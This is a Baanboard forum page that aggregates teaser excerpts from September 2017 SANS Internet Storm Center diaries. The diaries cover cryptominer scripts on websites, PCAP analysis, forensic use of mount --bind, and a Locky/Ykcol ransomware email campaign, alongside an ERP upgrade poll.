Go Back > News > RSS Newsfeeds > Categories

User login

Frontpage Sponsor


For ERP LN feature pack upgrade, what method of install are you using?
Installation Wizard into existing VRC
Installation Wizard into new VRC
Manual into existing VRC
Manual into new VRC
Total votes: 38

Baanboard at LinkedIn

Reference Content


Who's Borrowing your Resources?, (Sat, Sep 30th)

SANS Internet Storm Center - October 1, 2017 - 1:44pm
There is a buzz that started to stir in the past few days with the rise of cryptocurrency miner javascript code showing up on various websites. In particular, it seems to be Coinhive's miner javascript code.  I do want to note that Coinhive specifically states:
Categories: Security

Good Analysis = Understanding(tools + logs + normal), (Fri, Sep 29th)

SANS Internet Storm Center - September 29, 2017 - 8:40pm
We had a reader send an email in a couple of weeks ago asking about understanding the flags field when looking at data in a report.   He didn't understand what the "flags" were referring to or what the actual flags mean. "They don’t appear related to TCP header flags like I’ve normally seen...S is the most common but I occasionally see RSA, RUS and a few others."
Categories: Security

The easy way to analyze huge amounts of PCAP data, (Thu, Sep 28th)

SANS Internet Storm Center - September 28, 2017 - 8:04am
When you are investigating a security incident, there are chances that, at a certain point, you will have to dive into network traffic analysis. If you’re lucky, you’ll have access to a network capture. Approximatively one year ago, I wrote a quick diary[1] to explain how to implement a simple FPC or “Full Packet Capture” solution based on a Docker container. It’s nice to capture all the traffic in PCAP files but then? PCAP files are not convenient to process and they consume a lot of disk space (depending on the captured traffic of course).
Categories: Security

It is a resume - Part 3, (Sun, Sep 10th)

SANS Internet Storm Center - September 27, 2017 - 9:17am
In this short series of diary entries, I show how I try to conclude that a PDF file (a resume) is not malicious, but benign. This is the last part. Thanks to Xavier for letting me post this during his shift.
Categories: Security

Forensic use of mount --bind, (Sun, Sep 24th)

SANS Internet Storm Center - September 24, 2017 - 1:28am
In my previous diary, I mentioned a recent case that led me to write In that case, I mentioned that I needed to build a filesystem timeline and wanted to collect hashes because I suspected there were multiple copies of some possible malware scattered around the disk. The biggest issue I had was that hashing the files requires reading them which would update the access times, something I really did not want to do. So, I decided to use a trick on a live system that I had employed occasionally in the past when I got a tar file rather than a disk image of, say, a directory from a SAN or NAS. For those of you who aren't aware, on Linux, you can use the mount command to essentially link a directory to another location in the directory tree. In the screenshot below, you can see the results of df -h and mount on one of my test VMs.
Categories: Security

What is the State of Your Union? , (Fri, Sep 22nd)

SANS Internet Storm Center - September 23, 2017 - 12:54am
Regularly the President of the United States delivers the State of the Union address. This practice "fulfills rules in Article II, Section 3 of the U.S. Constitution, requiring the President to periodically give Congress information on the "state of the union” and recommend any measures that he believes are necessary and expedient.".
Categories: Security

Ongoing Ykcol (Locky) campaign, (Wed, Sep 20th)

SANS Internet Storm Center - September 20, 2017 - 8:12pm
Today I noticed a high amount of e-mails on my honeypots with similar subject, body and attachment. It caught my attention . After inspecting the attachments and doing some analysis, it was not difficult to realize that those supposed “Status Invoice” messages were, indeed, part of an ongoing campaign pushing a Locky ransomware variant that is being called Ykcol (or Locky in reverse) due to the encrypted file extension (“.ykcol”).
Categories: Security

All times are GMT +2. The time now is 22:39.

©2001-2017 - -